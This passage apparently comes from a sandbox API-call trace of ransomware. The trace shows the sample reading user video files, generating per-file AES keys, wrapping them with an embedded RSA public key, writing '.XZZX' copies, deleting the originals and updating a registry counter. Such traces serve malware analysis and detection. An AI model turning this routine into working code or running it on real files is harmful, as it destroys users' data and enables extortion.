07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned 117 [0130.813] StrStrW (lpFirst="MI1L.flv", lpSrch="XZZX") returned 0x0 [0130.813] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\MI1L.flv", dwFileAttributes=0x20) returned 1 [0130.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\MI1L.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\mi1l.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x68c [0130.813] ReadFile (in: hFile=0x68c, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x2951, lpNumberOfBytesRead=0x47fe418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x47fe418*=0x2951, lpOverlapped=0x0) returned 1 [0130.814] CloseHandle (hObject=0x68c) returned 1 [0130.814] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0130.815] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0130.815] SetErrorMode (uMode=0x1) returned 0x1 [0130.815] lstrcpyW (in: lpString1=0x47fe358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0130.815] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1fe60) returned 1 [0130.817] CryptGenKey (in: hProv=0x3d1fe60, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde898) returned 1 [0131.318] CryptExportKey (in: hKey=0x3cde898, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x47fe41c | out: pbData=0x0*, pdwDataLen=0x47fe41c*=0x94) returned 1 [0131.318] CryptExportKey (in: hKey=0x3cde898, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x47fe41c | out: pbData=0x40a0000*, pdwDataLen=0x47fe41c*=0x94) returned 1 [0131.318] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.319] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0131.319] CryptDestroyKey (hKey=0x3cde898) returned 1 [0131.319] CryptReleaseContext (hProv=0x3cf70d0, dwFlags=0x0) returned 0 [0131.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\5bbecda81a1e287c9df89f941e9e0cc4.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x698 [0131.319] WriteFile (in: hFile=0x698, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x2951, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x47fe438*=0x2951, lpOverlapped=0x0) returned 1 [0131.320] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2951 [0131.320] WriteFile (in: hFile=0x698, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47fe438*=0x5, lpOverlapped=0x0) returned 1 [0131.320] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2956 [0131.320] WriteFile (in: hFile=0x698, lpBuffer=0x47ff860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x47ff860*, lpNumberOfBytesWritten=0x47fe438*=0x10, lpOverlapped=0x0) returned 1 [0131.320] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2966 [0131.320] WriteFile (in: hFile=0x698, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47fe438*=0x5, lpOverlapped=0x0) returned 1 [0131.320] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x296b [0131.320] SetErrorMode (uMode=0x1) returned 0x1 [0131.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0131.320] OutputDebugStringW (lpOutputString="end") [0131.320] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ\x7f\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x47fdbf4, pcbBinary=0x47fd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x47fdbf4, pcbBinary=0x47fd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0131.321] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x47fdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x47fd3dc, pcbStructInfo=0x47fd3d8 | out: pvStructInfo=0x47fd3dc, pcbStructInfo=0x47fd3d8) returned 1 [0131.321] CryptAcquireContextW (in: phProv=0x47fd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x47fd3e4*=0x3cf7158) returned 1 [0131.321] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf7158, dwCertEncodingType=0x1, pInfo=0x3d0ea68*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0ea98*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0eaa0*, PublicKey.cUnusedBits=0x0), phKey=0x47fd3ec | out: phKey=0x47fd3ec*=0x3cde898) returned 1 [0131.321] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.321] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0131.322] CryptEncrypt (in: hKey=0x3cde898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x47fd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x47fd3f0*=0x80) returned 1 [0131.322] CryptEncrypt (in: hKey=0x3cde898, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf71e0*, pdwDataLen=0x47fd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf71e0*, pdwDataLen=0x47fd3e8*=0x80) returned 1 [0131.322] WriteFile (in: hFile=0x698, lpBuffer=0x3cf71e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x3cf71e0*, lpNumberOfBytesWritten=0x47fe438*=0x80, lpOverlapped=0x0) returned 1 [0131.322] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0131.322] WriteFile (in: hFile=0x698, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47fe438*=0x5, lpOverlapped=0x0) returned 1 [0131.322] GetUserNameW (in: lpBuffer=0x47fe1f8, pcbBuffer=0x47fdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x47fdfe0) returned 1 [0131.322] wsprintfW (in: param_1=0x47fdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0131.322] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x47fdfe4 | out: phkResult=0x47fdfe4*=0x6a0) returned 0x0 [0131.322] RegQueryValueExW (in: hKey=0x6a0, lpValueName="E1010314", lpReserved=0x0, lpType=0x47fdfd8, lpData=0x47fdfec, lpcbData=0x47fdfdc*=0x4 | out: lpType=0x47fdfd8*=0x4, lpData=0x47fdfec*=0xb2, lpcbData=0x47fdfdc*=0x4) returned 0x0 [0131.322] RegCloseKey (hKey=0x6a0) returned 0x0 [0131.322] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x47fdfe8 | out: phkResult=0x47fdfe8*=0x6a0) returned 0x0 [0131.322] RegSetValueExW (in: hKey=0x6a0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x47fdfec*=0xb3, cbData=0x4 | out: lpData=0x47fdfec*=0xb3) returned 0x0 [0131.322] RegCloseKey (hKey=0x6a0) returned 0x0 [0131.322] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.323] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.323] CloseHandle (hObject=0x698) returned 1 [0131.324] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0131.324] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0131.324] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\MI1L.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\mi1l.flv")) returned 1 [0131.324] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\MI1L.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\mi1l.flv")) returned 0 Thread: id = 443 os_tid = 0xa24 [0131.155] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.155] lstrcpyW (in: lpString1=0x420f460, lpString2="No0nJ8TKbF9hYhiurGN.mp4" | out: lpString1="No0nJ8TKbF9hYhiurGN.mp4") returned="No0nJ8TKbF9hYhiurGN.mp4" [0131.155] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0131.155] SetErrorMode (uMode=0x1) returned 0x1 [0131.155] lstrcpyW (in: lpString1=0x420f860, lpString2="No0nJ8TKbF9hYhiurGN.mp4" | out: lpString1="No0nJ8TKbF9hYhiurGN.mp4") returned="No0nJ8TKbF9hYhiurGN.mp4" [0131.155] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xefb9a7dd, Data2=0x3ca2, Data3=0x4d06, Data4=([0]=0xb8, [1]=0x66, [2]=0x1b, [3]=0x16, [4]=0xbc, [5]=0x9d, [6]=0xcc, [7]=0xd4))) returned 0x0 [0131.155] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\No0nJ8TKbF9hYhiurGN.mp4") returned 103 [0131.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0131.155] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned 117 [0131.155] StrStrW (lpFirst="No0nJ8TKbF9hYhiurGN.mp4", lpSrch="XZZX") returned 0x0 [0131.155] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\No0nJ8TKbF9hYhiurGN.mp4", dwFileAttributes=0x20) returned 1 [0131.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\No0nJ8TKbF9hYhiurGN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\no0nj8tkbf9hyhiurgn.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a4 [0131.156] ReadFile (in: hFile=0x6a4, lpBuffer=0x4364048, nNumberOfBytesToRead=0x1d09, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4364048*, lpNumberOfBytesRead=0x420e418*=0x1d09, lpOverlapped=0x0) returned 1 [0131.157] CloseHandle (hObject=0x6a4) returned 1 [0131.157] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4560000 [0131.157] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4570000 [0131.158] SetErrorMode (uMode=0x1) returned 0x1 [0131.158] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0131.158] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf70d0) returned 1 [0131.160] CryptGenKey (in: hProv=0x3cf70d0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde918) returned 1 [0131.360] CryptExportKey (in: hKey=0x3cde918, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0131.360] CryptExportKey (in: hKey=0x3cde918, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4570000, pdwDataLen=0x420e41c | out: pbData=0x4570000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0131.360] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.361] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0131.361] CryptDestroyKey (hKey=0x3cde918) returned 1 [0131.361] CryptReleaseContext (hProv=0x3cf7268, dwFlags=0x0) returned 0 [0131.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\36D405DA123E25CCEFB9A7DD165F0A14.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\36d405da123e25ccefb9a7dd165f0a14.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x69c [0131.361] WriteFile (in: hFile=0x69c, lpBuffer=0x4364048*, nNumberOfBytesToWrite=0x1d09, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4364048*, lpNumberOfBytesWritten=0x420e438*=0x1d09, lpOverlapped=0x0) returned 1 [0131.362] SetFilePointer (in: hFile=0x69c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d09 [0131.362] WriteFile (in: hFile=0x69c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0131.362] SetFilePointer (in: hFile=0x69c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d0e [0131.362] WriteFile (in: hFile=0x69c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2e, lpOverlapped=0x0) returned 1 [0131.362] SetFilePointer (in: hFile=0x69c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d3c [0131.362] WriteFile (in: hFile=0x69c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0131.362] SetFilePointer (in: hFile=0x69c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1d41 [0131.362] SetErrorMode (uMode=0x1) returned 0x1 [0131.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0131.362] OutputDebugStringW (lpOutputString="end") [0131.363] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0131.363] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0131.363] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cf72f0) returned 1 [0131.363] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf72f0, dwCertEncodingType=0x1, pInfo=0x3cf1370*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf13a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf13a8*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde918) returned 1 [0131.363] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.364] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0131.364] CryptEncrypt (in: hKey=0x3cde918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0131.364] CryptEncrypt (in: hKey=0x3cde918, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7378*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7378*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0131.364] WriteFile (in: hFile=0x69c, lpBuffer=0x3cf7378*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7378*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0131.364] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0131.364] WriteFile (in: hFile=0x69c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0131.364] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0131.364] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0131.364] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x6a4) returned 0x0 [0131.365] RegQueryValueExW (in: hKey=0x6a4, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xb3, lpcbData=0x420dfdc*=0x4) returned 0x0 [0131.365] RegCloseKey (hKey=0x6a4) returned 0x0 [0131.365] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x6a4) returned 0x0 [0131.365] RegSetValueExW (in: hKey=0x6a4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xb4, cbData=0x4 | out: lpData=0x420dfec*=0xb4) returned 0x0 [0131.365] RegCloseKey (hKey=0x6a4) returned 0x0 [0131.365] VirtualFree (lpAddress=0x4560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.365] VirtualFree (lpAddress=0x4570000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.365] CloseHandle (hObject=0x69c) returned 1 [0131.366] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0131.366] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0131.366] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\No0nJ8TKbF9hYhiurGN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\no0nj8tkbf9hyhiurgn.mp4")) returned 1 [0131.367] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\No0nJ8TKbF9hYhiurGN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\no0nj8tkbf9hyhiurgn.mp4")) returned 0 Thread: id = 444 os_tid = 0xa30 [0131.325] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 